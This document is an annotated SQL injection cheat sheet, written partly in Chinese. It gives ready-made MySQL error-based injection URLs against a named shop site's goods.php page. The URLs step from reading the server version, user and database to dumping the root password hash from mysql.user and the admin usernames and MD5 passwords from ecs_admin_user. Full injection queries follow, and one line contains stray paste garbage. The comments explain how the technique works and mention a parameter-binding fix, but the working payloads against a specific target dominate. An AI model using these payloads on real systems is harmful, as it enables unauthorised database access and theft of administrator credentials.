判断版本号 (read `@@version`). Every request on this page is MySQL error-based injection: `concat(<value>,0x3a,floor(rand()*2))` is used as the `group by` key of a derived table, the key collides, and MySQL's `Duplicate entry '<value>:N' for key 'group_key'` error carries the value back into the page — so this only works while the application reflects database errors to the client. The `(1,1)>(...)` wrapper merely gives the erroring subquery a syntactically valid place inside the `and` condition, and `%23` (`#`) comments out the remainder of the original query. Because `rand()` here is unseeded and the row source `(select 1 union select 2)` has only two rows, the collision is probabilistic and a request may have to be repeated (the seeded `rand(0)` form at the bottom of the page is deterministic). Defensive fix on the application side: bind `id`/`wsid` as query parameters and stop echoing database errors in responses.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统 (read `@@version_compile_os`, the operating system MySQL was built for).
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user() (the account the application connects with; whether the later `mysql.user` read succeeds depends on this account's privileges).
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database() (the schema the application is using — presumably the `sansan1` schema the later queries target).
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash — reads `Password` from `mysql.user` where `User=char(114,111,111,116)` ('root'). This needs SELECT privilege on the `mysql` schema, and the `Password` column no longer exists from MySQL 5.7 on (`authentication_string` replaced it), so on newer servers the query itself fails instead of leaking the hash.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名 — table names from `information_schema.tables` for `TABLE_SCHEMA=char(115,97,110,115,97,110,49)` ('sansan1'); `limit 6,1` returns the 7th table, so the offset is incremented to walk the list one name per request.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段 — column names of `TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)` ('ecs_admin_user') in 'sansan1'; `limit 2,1` returns the 3rd column.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password — the same query with `limit 4,1` (5th column).
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5) — `concat_ws(char(94),...)` joins `password` and `user_name` with '^', and `ifnull(...,char(32))` stops a NULL column from turning the whole value NULL. MySQL truncates the key shown in the duplicate-entry error (about 64 characters in practice), so long rows may have to be read in pieces; `limit 0,1` is incremented to reach further accounts.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
报错注射 (error-based injection) — the same technique written out as the full server-side query. Here `rand(0)` is seeded, so its `floor(rand(0)*2)` sequence (0,1,1,0,1,1,...) is fixed and the group-by collision is guaranteed once the row source (`information_schema.tables`) has at least 3 rows; the inner `limit 0,1` keeps the scalar subquery to a single row.
0 k6 S: w4 G- P% ]SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)9 R4 u4 S3 o2 Z) S6 q
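-- Same error-based construction as the version probe, but the leaked value
-- is the first username of admin_table (LIMIT 0, 1; raise the offset for the
-- next account). Relies on the seeded rand(0) collision over
-- information_schema.tables (>= 3 rows) and on the application echoing the
-- "Duplicate entry ... for key 'group_key'" error.
-- Trailing paste garbage from the original listing has been dropped.
SELECT *
FROM table_name
WHERE uid = -1
UNION
SELECT
    1,
    (
        SELECT 1
        FROM (
            SELECT
                count(*),
                concat(
                    (SELECT (SELECT username FROM admin_table LIMIT 0, 1) FROM information_schema.tables LIMIT 0, 1),
                    floor(rand(0) * 2)
                ) AS x
            FROM information_schema.tables
            GROUP BY x
            LIMIT 0, 1
        ) AS a
    )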
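-- Injection fragment meant to be appended to an existing WHERE clause: it
-- leaks the name of the 22nd schema (LIMIT 21, 1 on
-- information_schema.SCHEMATA) through the same floor(rand(0)*2) / GROUP BY
-- duplicate-key error. 0x7e and 0x27 ('~' and "'") are concatenated around
-- SCHEMA_NAME, presumably as delimiters that make the value easy to pick out
-- of the error text. Unlike the two statements above there is no LIMIT after
-- GROUP BY, which the original also omits.
-- Stray trailing "|" from the original paste has been dropped.
and (
    select 1
    from (
        select
            count(*),
            concat(
                (
                    select (
                        select (
                            select concat(0x7e, 0x27, SCHEMA_NAME, 0x27, 0x7e)
                            from information_schema.SCHEMATA
                            limit 21, 1
                        )
                    )
                    from information_schema.tables
                    limit 0, 1
                ),
                floor(rand(0) * 2)
            ) as x
        from information_schema.tables
        group by x
    ) as a
)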